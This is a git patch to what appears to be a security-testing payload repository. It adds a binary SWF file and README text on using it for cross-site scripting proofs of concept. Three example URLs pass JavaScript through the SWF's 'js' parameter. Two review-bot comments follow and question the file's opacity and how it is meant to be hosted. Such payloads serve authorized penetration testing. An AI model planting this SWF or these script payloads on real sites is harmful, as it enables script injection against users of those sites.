From d10fb82647e0739d36ed43cced6bcaefd8c98eaa Mon Sep 17 00:00:00 2001 From: Jason Haddix Date: Tue, 3 Nov 2015 12:45:34 -0800 Subject: [PATCH] adding swf xss file adding swf xss file --- Payloads/README.md | 16 +++++++++++++++- Payloads/xssproject.swf | Bin 0 -> 1053 bytes 2 files changed, 15 insertions(+), 1 deletion(-) create mode 100644 Payloads/xssproject.swf diff --git a/Payloads/README.md b/Payloads/README.md index d8c70a09..910420bb 100644 --- a/Payloads/README.md +++ b/Payloads/README.md 
@@ -26,4 +26,18 @@ The EICAR Standard Anti-Virus Test File or EICAR test file is a computer file th Anti-virus programmers set the EICAR string as a verified virus, similar to other identified signatures. A compliant virus scanner, when detecting the file, will respond in exactly the same manner as if it found a harmful virus. Not all virus scanners are compliant, and may not detect the file even when they are correctly configured. -The use of the EICAR test string can be more versatile than straightforward detection: a file containing the EICAR test string can be compressed or archived, and then the antivirus software can be run to see whether it can detect the test string in the compressed file. \ No newline at end of file +The use of the EICAR test string can be more versatile than straightforward detection: a file containing the EICAR test string can be compressed or archived, and then the antivirus software can be run to see whether it can detect the test string in the compressed file. + +## xssproject File + +As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs. + +This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either. + +Examples: + +Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); + +IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);} + +IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1); \ No newline at end of file 
diff --git a/Payloads/xssproject.swf b/Payloads/xssproject.swf new file mode 100644 index 0000000000000000000000000000000000000000..a0e7b36ce12df577b2d2a4a4987610596dfced2e GIT binary patch literal 1053
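Review bot: the three example URLs in the new "xssproject File" section wrap the window.open arguments in typographic quotes (‘ ’), so they fail if copied as written; use ASCII single quotes, e.g. `window.open('?js=history.go(-1)','_self')`. The section cites [1] and [2] but lists no references anywhere in Payloads/README.md, and the examples point at an external host (http://0me.me/demo/xss/xssproject.swf) rather than the Payloads/xssproject.swf file this commit adds, so the PoC is not reproducible from the repository alone. Because the file runs whatever script the `js` parameter carries on the origin that serves it, the text should state plainly that it is only to be hosted on a disposable test origin during an authorized test, never next to real content. Also, the hunk restores the newline after the EICAR paragraph but the new final line again ends with `\ No newline at end of file`.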
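Review bot: Payloads/xssproject.swf is added as an opaque 1053-byte binary (Bin 0 -> 1053 bytes) with no ActionScript source, build steps or checksum, so a reviewer cannot confirm that the blob does only what the README describes. Commit the source (or link to where [1] and [2] publish it), record the file's SHA-256 in the README so users can verify the artifact before running it, and prefer building the SWF from source over vendoring the binary.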